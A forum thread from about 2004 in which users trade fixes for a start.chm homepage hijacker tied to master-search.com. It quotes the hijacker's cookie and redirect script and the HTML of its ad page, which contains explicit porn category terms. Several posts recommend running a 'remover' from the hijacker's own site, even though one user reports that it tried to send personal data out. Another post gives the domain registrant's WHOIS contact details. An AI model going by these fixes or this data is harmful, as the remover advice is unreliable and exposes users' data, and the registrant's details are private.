Please excuse my double post, but I think I figured out how to get rid of it now. Go to www.master-search.com and there will be a link to download an application that claims to remove it. And remember, just about all of these spyware things like this have a removal patch, you just have to look for it. As to whether this one will hold out or not..I'll get back to you on that.

0

I had the same exact problem. I just removed it using a file called: delindex.bat.

0

Hi (not sure my first post went through... sorry if you read that twice), same problem here, tried all the above, no success. Just tried Hijack This, and the problem seems to be gone so far (it usually comes back within 2 min after I open IE). Ok, I'm not an expert, but I wouldn't try the www.master-search option for 2 reasons: 1) they're the ones who are hijacking your start page (click on one of the links, you'll get there...) 2) this problem is very similar to the recent Cool Web Search s---e that was doing exactly the same (hijacking your start page) and guess what... they were offering to DL a file to get rid of what they had created... when looking for a solution to it, I read someone's post who was saying he did it and it caused more problem... Anyway... I've been typing this email for a good 5 minutes and the problem is still not back, so the Hijack This option is working so far. For those who want to have a go: 1. DL Hijack This and install it: http://download.com.com/3000-8022-10227352.html?tag=lst-0-3 2. Click on Scan 3. Select the registry String Value that defines your start page: in my case it was listed twice as: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = mk:@MSITStore:C:\WINDOWS\start.chm::/start.html 4. click on "Fixed Checked" It will not delete the String Value but set it as "C:\WINDOWS\SYSTEM\blank.htm" (IE default page if no website set as start page) 5. Make sure you "fix" both start page string values 6. close all IE windows 7. go into Internet properties and set your start page Let us know if it works for anyone else (as I finish this post, after 10-15 min the problem is still not back...!!!) Cheers David

0

Thanks that worked great i think i havent restarted though but btw anyone know where this came from?

0

Attempted using Spybot and hijackthis.exe...did not correct the problem

0

Been working on this all day with apps like Panda Antivirus and SpyBot. Found this thread and used yabasta's procedure. Start page changes back, start.chm and command.pif reappear in C:\WINDOWS. Toughest bug I've ever seen.

0

There seems to be an uninstaller. I was skeptical but also desperate so I tried it. After several reboots and reloads it is finally gone. http://www.master-search.com/ Run that and then delete c:\windows\start.chm and c:\windows\start.html

0

Thank You all for the hints!! It was very useful for me, becouse I had the same problem!!!

0

Information technology will become more and more important. Society must not let scumware slow down our progress. The lowlifes who produce these bugs must be confronted aggressively. There should be a law that says all adware must be more complicated to install than to uninstall.

0

Ok guys, so what do you actually use to remove this bug??? Which one of the solutions actually work, please reply here!1 Thanks

0

Found that on another board, it worked for me so far: 1. Try right clicking on the start.html file and clicking edit. Delete all the text. add then make it read only. 2. Open start.chm in notepad and do the same as above. And please read this about the master-search.com option before using it (taken from another board too - dunno if I can post the actual links): I've been battling with this for a couple days now and the closest I got to ridding of it was today, when I came across a remove.exe hosted by the same site that made the spyware(master-search.com). I was obviously a bit suspicious of it but it was worth a shot. I set a restore point, and loaded up filemon before I ran it to see what it was actually doing. I still have the log of this for those who want to see it. It basicly went around gathering information (internet history, dialup accounts etc...) and then attempted to send it back to master-search.com which I stopped. then it said "successfuly removed" and to my suprise the homepage was set back to msn.com. This was short lived as I came back several hours later only to find that start.chm and start.html were back in action. I hope there is a fix for it soon, reformatting is sounding better and better. Cheers yabasta

0

All the links on the "NEW" start page, point to the pages of http://www.master-search.com/ . This has been proposed as a fix. I would not trust the people that created this mess to also fix it. I would not use the uninstaller suggested. I have found that a file called windows/HH.EXE may be involved. Does anybody recognize that file as being a normal file?

0

The master-search solution I mentioned has worked fine for me so far. I've rebooted and went back into IE a few times. I must add though that I also did something in the registry prior to running the master-search fix. Here's a link to a site I found when I was searching for information on this worm. http://seclists.org/lists/bugtraq/2004/Mar/0307.html After I did that, I also deleted something in the registry whose name corresponded with the worm. I can't remember it exactly now and I don't know if that was necessary. So far, so good. I ran Hijack This after and found nothing with the name mentioned by someone above that is related to this problem.

0

Hi all, Im not sure if this would work, but why dont you guyz try using a different web browser. Personally, I use Opera web browser, and have never had a problem, except the occasional crash, but even that isnt a problem because it has the option to resume browsing where you left off. Also, it supports tabbed browsing, which is amazing. Lazer Fazer

0

hello, I got the same happen to me after the occasional visit to a porn site. Try the following... I did it almost six hours ago and my home page has remained where had I set it to. Before i did this, my home page kept resetting to an unsolicited search site less than 10 minutes after I changed the home page. 1. with notepad, open start.chm. its in your c/windows. delete everything in it, and save. 2. Go to the site which you prefer to be your home page. 3. In the internet options, set the home page to the current site. 4. lastly, in c/windows, change the property of start.chm to read-only. perhaps its God way to keep us from visiting those free porn sites. :-x

0

g2, you are the man! this thing was kicking my ass for a week, been running Spybot (didn't see it as a problem) and Hijack this! (kept coming back...) until I deleted the contents of the 2 Start files...thanks for the info, everybody else above needs to check it out...AND EVERYBODY STAY THE HELL AWAY FROM MASTER-SEARCH.COM, THEY ARE THE PROBLEM!!!!!!!

0

g2, you f00kin' rule! Great cure for the bug. Now, can you find out where the guilty party lives? ; )

0

As I have stated, I used the master-search removal method and I have experienced no problems whatsoever. But I also did that thing in the registry, so maybe that is also why. You people are just too paranoid. Almost ALL spyware has a way to remove it, and is what I usually do when the spyware removal programs like spybot can't find it. I believe it is required by law, or something, and to avoid being sued and fined the companies hide the removal method pretty well, but it's there, and it works. Don't tell people to stay away from using this method because it's worked for me just fine. But if the other way that g2 said works, then by all means, do that instead. But I wouldn't want that start.chm file to remain around on my hard drive personally, who knows what it's capable of as far as tracking, etc, that you don't know about or can't see in notepad. And who knows what other files are attached to it. Some people above mentioned a few other files for example.

0

Sorry guys but I don't think you solved a thing. I had cleared the content of the start file and marked it read only but after hours of not seeing any changes I deleted it and it hasn't returned in several hours. There is something in your pc talking to a computer out there and even if the start files and others don't change they are still talking until you get rid of the real problem. I adjusted my firewall and blocked some servers but I don't think that is why the start file hasn't returned. I do know that the start file kept changing and that was an update from somewhere out there, best I can tell somewhere in Russia. They will be getting up soon and maybe a new update is due but for now it ain't over.

0

Removing contents of start.chm & start.html and disabling write permission seems to work for me too. Of course, if you use this technique for every permutation of this problem, you will end up with a bunch of bogus files in your windows directory. For those on NT, Win2K or XP, you might try logging in as a restricted user rather than as an administrator on power user. This will minimize the risk of writing to the C:\WINDOWS\ directory (and other system directories) because ordinary users don’t have write permission to those places. FWIT: Netscape doesn't suffer from the problem either. Maybe it's time to run LINUX on the desktop? Microsoft continues to provide systems which are easy targets for these guys. Let's move to LINUX.

0

The only way to fix this is by using CWShredder. e mail merijn@spywareinfo.com and ask him to do an update.

0

Idid what G2 said. After I made it read only I simply deleted it. It seems to have solved the problem.

0

I also deleted it from the registry. It seems to regenerate from there. I still think the best solution is CWShreder. I hope he updates it soon. I sent him some money last week.

0

tried almost all of the above and nothig except the "notepad & read only trick" worked....thanks I hope it won't come back... but my guess is we'll be hearing about start.chm a lot in the next few days.... anyway...I know how to fix it now....

0

Hurst is right. Deleting text and making the file read only does work. Thank God!

0

But making start.chm read-only only limits their use to that file. They can create another file: "start1.chm" or "hahahawefoolyouagain.chm". That would be nice if you could fubar their server! I would cry with excitement!

0

Well, here's yer guys. Domain Name: MASTER-SEARCH.COM Registrant: VasyaK Vasya Kulachkov (info@master-search.com) PO BOX 386 Dnepropetrovsk null,54300 UA Tel. +062.386482 Creation Date: 24-Mar-2004 Expiration Date: 24-Mar-2005 Domain servers in listed order: 24572.dns1.myorderbox.com 24572.dns2.myorderbox.com 24572.dns3.myorderbox.com 24572.dns4.myorderbox.com Administrative Contact: VasyaK Vasya Kulachkov (info@master-search.com) PO BOX 386 Dnepropetrovsk null,54300 UA Tel. +062.386482 Technical Contact: VasyaK Vasya Kulachkov (info@master-search.com) PO BOX 386 Dnepropetrovsk null,54300 UA Tel. +062.386482 Billing Contact: VasyaK Vasya Kulachkov (info@master-search.com) PO BOX 386 Dnepropetrovsk null,54300 UA Tel. +062.386482 And here's some traceroute information to tell you who's providing their upstream: (snip hops to me) 4 205.171.21.29 164ms 155ms 191ms TTL: 0 (atl-core-02.inet.qwest.net fraudulent rDNS) 5 205.171.8.154 183ms 184ms 185ms TTL: 0 (dca-core-02.inet.qwest.net fraudulent rDNS) 6 205.171.9.50 192ms 183ms 220ms TTL: 0 (dca-core-03.inet.qwest.net fraudulent rDNS) 7 205.171.8.217 204ms 162ms 184ms TTL: 0 (jfk-core-03.inet.qwest.net fraudulent rDNS) 8 205.171.230.25 177ms 161ms 173ms TTL: 0 (jfk-brdr-02.inet.qwest.net fraudulent rDNS) 9 213.248.82.245 182ms 170ms 178ms TTL: 0 (nyk-bb2-pos0-3-1.telia.net ok) 10 213.248.82.22 238ms 164ms 158ms TTL: 0 (nyk-i1-pos3-0.telia.net fraudulent rDNS) 11 213.248.83.30 181ms 169ms 178ms TTL: 0 (nyk-i10-pos4-0-0.telia.net ok) 12 213.248.83.42 178ms 168ms 192ms TTL: 0 (peterstar-101402-nyk-i10.c.telia.net ok) 13 81.222.0.113 335ms 294ms 342ms TTL: 0 (so-0-3-3.RT701-001.london.retn.net probable bogus rDNS: No DNS) 14 81.222.0.97 321ms 283ms 281ms TTL: 0 (so-0-2-0.RT721-001.helsinki.retn.net probable bogus rDNS: No DNS) 15 81.222.0.85 330ms 293ms 365ms TTL: 0 (so-0-3-0.RT001-001.spb.retn.net probable bogus rDNS: No DNS) 16 81.222.0.82 305ms 340ms 294ms TTL: 0 (No rDNS) 17 217.170.94.190 309ms 300ms 393ms TTL: 0 (No rDNS) 18 62.16.97.73 296ms 329ms 307ms TTL: 0 (Spb-TVT-CR3-GE-4-0.IPNet.Ru probable bogus rDNS: No DNS) 19 62.16.96.9 373ms 314ms 316ms TTL: 0 (Spb-NCC-CR1-POS2.IPNet.Ru probable bogus rDNS: No DNS) 20 62.16.97.22 297ms 295ms 291ms TTL: 0 (Spb-TP67-CS6-GE-1-1.IPNet.Ru probable bogus rDNS: No DNS) 21 193.125.201.9 353ms 329ms 335ms TTL: 0 (virgo.ilca.ru ok) 22 193.125.201.49 314ms 318ms 324ms TTL: 0 (c-49-africa-md-satelite1.realsearch.ws probable bogus rDNS: No DNS) I wouldn't necessarily trust the 'probable bogus/fraudulent DNS' flags - I happen to know that the qwest lines are legit. What you want to do is bombard qwest.net, telia.net, and ilca.ru with POLITE requests to depeer/disconnect this dork's netblock. Hopefully we can get him off the net permanently, but I doubt it. Lots of clue-resistant providers out there.

0

I did what G2 said to do and the problem is gone......thanks.....

0

Hey. I'm the one who posted the origiganl fix about deleting the contents of start.chm and start.html and then marking them as read only... One thing I found out is that the virus seems to go in stages. Some of you will remember that it started only using the Start.chm file (there was no Start.html file to begin with). Well later on it used both files, and for me it eventually went back to just the one file (start.chm). Anyway if you computer ONLY has the start.chm file, then using my fix (del contents and read only) will not fix the problem. HOWEVER, once it starts using both files (you have both Start.chm AND start.html in your Windows or WINNT directory) then my fix seems to work. It's been a couple days now for me with no problems. I myself will continure to use this method until CWShredder or Ad-Aware are able to fix it permenantly. I think the remove.exe is not a good idea, but that's just my opinion. I would rather trust Merlin or Lavasoft to come up with a real solution.

0

ultraviolence, you are ultrafunny. hilarious. thanks for the laughs. ;) to everyone else, glad it worked for you too.

0

UltraViolence...you're right...I woke up today just to find out that the bug was still there....I just had the start.chm file...now this was on my browser URL bar: mk:@MSITStore:C:\WINDOWS\start.chm::/spplain.html so...I think it may have started with new files... anyway, I did run a search on spplain.html but nothing appeared..... gladly today the page that appears is the "search page" and not porn like yesterday.... well..I'll keep doing the "read only trick" till a better solutions comes up...

0

I forgot to post a question... I'm deleting start.chm after doing all the stuff to fix the problem...is this right or should I leave it there?? thanx

0

I was wondering if anyone is still having problems? I have deleted, blocked, scanned, and all kinds of things. I didn't want to merely use the read only method and leave the rest of the mess active on my pc, I think there were a couple more files that changed when start.chm appeared. The last time I deleted the file was last night and there has been no sign of it coming back after several hours being online this morning and this evening. I continue to scan with Adaware being as how they had 3 updates yesterday and 1 today and it has cosistantly showed me as clean even when the file was reappearing, Several scanners showed me as clean also. Anyone know if any anti-spyware is able to detect it yet?

0

Thanks for all the tips and remedys. I think we should all bug the top #1 and #2 sites listed on master-search.com. I would assume they're paying something to be listed that high every search. Call them on there 800 numbers and tell them what they're associating with and you wouldn't do business with them because of that. Under 'internet options' (IE5.5) I have everything disabled except cookies, temp cookies, and active scripting disabled, and I got it too. I have 3 Yahoo email accounts and all of them recieve the same spam. 1 of the accounts isn't even used for anything, so I know it has to be Yahoo sending it. Maybe got from Yahoo?? Is everyone using Yahoo? But I'll have to admit, could have been porn ;) More about the problem that I have noticed: I have 4 hot buttons on my laptop. Whe I open an IE browser using my the button set to my homepage, within 2 minutes it changes. But if I use another button set to a website, it doesn't. When I click on a link that opens a browser it changes. I think it recognizes it somehow?? Anyway, I'm going to try the delete contents and read only method. I'll let you know! Thanks!!! Angel

0

Ok, I have been fighting this as long as you guys have and have just about had it. I have tried the deleting start.chm and start.htm. They eventually didn't come back, but my homepage hijacker still did. Tried making new start.chm and start.htm files and putting nothing in them and making them read only. Have tried spybotSD, it found this: Error during check!: Unknown (Ungültiger Datentyp für 'Start Page'). Tried tweaking the search values in the registry. No help there. I have noticed one thing through this all though. I use a very good popup blocker. Nothing ever gets through it. But since this bug has been embedded in my pc, my homepage (terrikaduck.netfirms.com) has had an unremovable popup on it, and you all know I don't have any popups on my site. The name that kept coming up was "peel". Anyway it's still there today. I was furious and desperate. I tried an old program my son gave me a few months ago I forgot about. PestPatrol. I could only get the trial version 4.2 so I downloaded the patch for it so it would work. But my results were: before deleting temp files, temporary internet files, recent files, history files, I had 97 adware, or spyware files on my pc. So I canceled it out and went to C and D properties and cleaned up my disks. Then ran it again. I still had 89 pieces of adware or spyware lurking on my pc. Alot embedded in the registry and some in program files but most were hanging out in my "favorites" folder. Every time you bookmark a page if there is adware or spyware on it you get that too. Anyway, every file it listed was classified either: suspicious or confirmed adware or spyware. I told it to delete every one of the 89 files. And guess what? I have no more popups on my sites homepage. I was really hoping that popup was in my computer and not everyone elses. I think I actually kicked it's little butt!!!

0

Like all of you, I have had this same problem for the last couple of days... tried a bunch of things, but was unable to get rid of the dam thing. I went to Symantec's website, performed a visual traceroute of the website - www.master-search.com - found that the site originated somewhere in Russia. What can we do about that? Initially, I tried like all of you, to delete the 2 freakin files start.html + start.chm and getting rid of the home page address in IE's Internet Options... The 2 files reappeared the next day. I then went into the start.html's javascript code - commented out the the last line of code that was suppose to redirect the location of the home page to start.chm + start.html. Guess what? The "//" in line that I commented out disappeared the next day(the virus/worm somehow removed the comment from the line of code that I changed)... OK, so I did more tweaking - I changed the line of codes from the cookie that the javascript called upon + I further changed the start.html javascript to: <SCRIPT LANGUAGE="JavaScript"> function getCookie(name) { var cookie = " " + document.cookie; var search = " " + name + "="; var setStr = 0; var offset = 0; var end = 0; if (cookie.length > 0) { offset = cookie.indexOf(search); if (offset != -1) { offset += search.length; end = cookie.indexOf(";", offset) if (end == -1) { end = cookie.length; } setStr = unescape(cookie.substring(offset, end)); } } return(setStr); } function setCookie (name, value, expires, path, domain, secure) { document.cookie = name + "=" + escape(value) + ((expires) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); } var rcookie=0; rcookie=getCookie("rotator"); if (rcookie) { rcookie++; setCookie("rotator", rcookie, "Mon, 01-Jan-2005 00:00:00 GMT", ""); } else { setCookie("rotator", "0", "Mon, 01-Jan-2005 00:00:00 GMT", ""); } window.location.replace("http://www.yahoo.com"); </SCRIPT> Instead of deleting the start.html, since I know that it would mysteriously reappear, I resaved the code to above. Notice, the last line of code - I made it so when you open start.html, it redirects to yahoo's website. I changed the home page garbage from Internet Options to "c:/windows/start.html", then I tested the it... everything was ok the rest of the day. BUT, next day the home page got changed again - this time to "mk:@MSITStore:C:\WINDOWS\start.chm::/spad.html" - what was before www.master-search.com home page became a porno homepage... I did a rt-click view source on the web page and found that ALL THE LINKS on this porno page related to www.master-search.com... Here is the code: <html> <head> <meta name="GENERATOR" content="Microsoft FrontPage 5.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>..:::Porn Categories:::..</title> <script language=javascript> </style> </head> <body> <script language="javascript"> var styleID=0; function DoFlash() { if (styleID==0) { flashstyle.styleSheet.cssText=".styleflash {BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid;background-color: #000000;}"; styleID=1; } else { flashstyle.styleSheet.cssText=".styleflash {BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid;background-color: #FFFFFF;}"; styleID=0; } } window.setInterval("DoFlash();",500); /*function window.onload() {*/ //alert (document.styleSheets.length); //} </script> <base target="_blank"> <table width="100%"> <tr> <td class="z" style="BORDER-BOTTOM: #808080 1px solid" vAlign="bottom" bgColor="#FFFF33" height="1"> <p style="MARGIN: 0px; WORD-SPACING: 0px" align="left">  <span style="FONT-WEIGHT: 400">Best Porn Categories  </span><span style="FONT-WEIGHT: 400"> </span></td> </tr> </table> <table width="100%"> <tr> ... <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> <a class="splink" href="http://www.master-search.com/search.php?id=644&qq=Weight%20Loss%20Pills" target="_top" style="text-decoration: none"> Weight Loss Pills</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="19"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Breast Enlargement</td> </tr> <tr> <td class="styleflash" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Sexual Enhancement </td> </tr> ... Travel </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Vegas Casinos</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Work At Home </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> DirecTV </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Magna Rx</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> MP3 Downloads </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Magazines</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Auctions</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Television </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 0px"> </td> </tr> <tr> <td style="font-size: 11px; font-family: Verdana,Arial"> <p align="center"> </p> <p align="center"> </td> </tr> </table> </td> <td vAlign="top" align="left" style="font-size: 11px; font-family: Verdana,Arial"> <table height="909" cellPadding="10" width="800"> <tr> <td vAlign="top" noWrap align="left" height="887" style="font-size: 11px; font-family: Verdana,Arial"> <b style="FONT-SIZE: 15px">Amateurs Models, Housewives, Movies, ... Interestingly, the start.html remained the same. So this file isn't causing the problem - apparently, it is just storing the pages we visit into a cookie and sending the info the redirect webpage "mk:@MSITStore:C:\WINDOWS\start.chm::/start.html" OR some other *.html file start.chm(or most likely, some other file) it created. (By the way, what does "mk:@MSITStore:" mean... any javascript experts here???) Anyways, the original start.chm changed into a porno start.chm -- WHAT THE HELL?..... I opened up "start.chm" in wordpad, I think it still looked the same as the original non-porn "start.chm"..... The only readable part I found inside (DOES anyone know what this means???): ::DataSpace/NameList[followed by 2 square symbols] <(::DataSpace/Storage/MSCompressed/Content[followed by 1 square symbol] ‚=‚,::DataSpace/Storage/MSCompressed/ControlData [square symbol] j [square symbol] ::DataSpace/Storage/MSCompressed/SpanInfo [square symbol] b [square symbol] /::DataSpace/Storage/MSCompressed/Transform/List [square] <&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/[square][square][square] i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable WHAT is the "start.CHM" help file calling upon? What file is it accessing with these ID numbers? Maybe I am being paranoid, but I noticed the last couple of times inside my "Temporary Internet Files" folder, I had this 68kb application file "reportstats"... Does anyone else have this file in their temp folder? Apprarently, this virus is regenerating/changing itself from some source file... I just can't find it... Has anyone found the source file/program?? I am LOST as to what to do about this virus/bug. Everytime I delete it, it reappears or changes to something else.

0

Sorry people, some how the code I copied didn't show up right on the post above... Here it is again (NOTICE: all the links point back to www.master-search.com): <html> <head> <meta name="GENERATOR" content="Microsoft FrontPage 5.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>..:::Porn Categories:::..</title> <script language=javascript> </style> </head> <body> <script language="javascript"> var styleID=0; function DoFlash() { if (styleID==0) { flashstyle.styleSheet.cssText=".styleflash {BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid;background-color: #000000;}"; styleID=1; } else { flashstyle.styleSheet.cssText=".styleflash {BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid;background-color: #FFFFFF;}"; styleID=0; } } window.setInterval("DoFlash();",500); /*function window.onload() {*/ //alert (document.styleSheets.length); //} </script> <base target="_blank"> <table width="100%"> <tr> <td class="z" style="BORDER-BOTTOM: #808080 1px solid" vAlign="bottom" bgColor="#FFFF33" height="1"> <p style="MARGIN: 0px; WORD-SPACING: 0px" align="left">  <span style="FONT-WEIGHT: 400">Best Porn Categories  </span><span style="FONT-WEIGHT: 400"> </span></td> </tr> </table> <table width="100%"> <tr> <td valign="top" width="182" style="font-size: 11px; font-family: Verdana,Arial"> <table style="BORDER-COLLAPSE: collapse" borderColor="#111111" cellSpacing="0" cellPadding="0" width="182" border="0"> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" align="left" width="182" bgColor="#FF9933" height="12"> <p align="center" style="MARGIN-LEFT: 5px">Today's Top</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="16"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Time Clock </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> <a class="splink" href="http://www.master-search.com/search.php?id=644&qq=Weight%20Loss%20Pills" target="_top" style="text-decoration: none"> Weight Loss Pills</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="19"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Breast Enlargement</td> </tr> <tr> <td class="styleflash" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Sexual Enhancement </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Credit Report </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Satellite TV </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Sport Betting </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Travel </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Vegas Casinos</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Work At Home </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> DirecTV </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Magna Rx</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> MP3 Downloads </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Magazines</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Auctions</td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 5px"> Television </td> </tr> <tr> <td class="x" style="BORDER-RIGHT: #808080 1px solid; BORDER-TOP: #ffffff 1px solid; BORDER-BOTTOM: #808080 1px solid" vAlign="top" align="left" bgColor="#FFFF00" height="12"> <p align="center" class="style2" style="MARGIN-LEFT: 0px"> </td> </tr> <tr> <td style="font-size: 11px; font-family: Verdana,Arial"> <p align="center"> </p> <p align="center"> </td> </tr> </table> </td> <td vAlign="top" align="left" style="font-size: 11px; font-family: Verdana,Arial"> <table height="909" cellPadding="10" width="800"> <tr> <td vAlign="top" noWrap align="left" height="887" style="font-size: 11px; font-family: Verdana,Arial"> <b style="FONT-SIZE: 15px">Amateurs Models, Housewives, Movies, Flashers Sex, Lesbians, Webcam Girls, Cheerleaders, Tits... <b style="FONT-SIZE: 15px">Anal Sex Fisting, Intercourse, f---ing, Masturbation Teens, Lesbians, Movies, Mature, Hardcore... <b style="FONT-SIZE: 15px">Blowjobs Oral Sex, Cock Sucking, Teens, Movies Deepthroat, Mature, Pornstars, Hardcore... <b style="FONT-SIZE: 15px">Cartoons Hentai, Anime, Adult Cartoons, Sex Lesbians, Erotic, Hardcore... <b style="FONT-SIZE: 15px">Cumshots Facials, Messy Cumshots, Gangbang, Teen Amateur, Nasty, Movies, Bukkake, Sticky... <b style="FONT-SIZE: 15px">Fetish Legs, Feet, Toes, Peeing, Balloons, Outdoors Voyeur, Stockings, Smoking, Nipples, Kinky Panties, Uniforms, 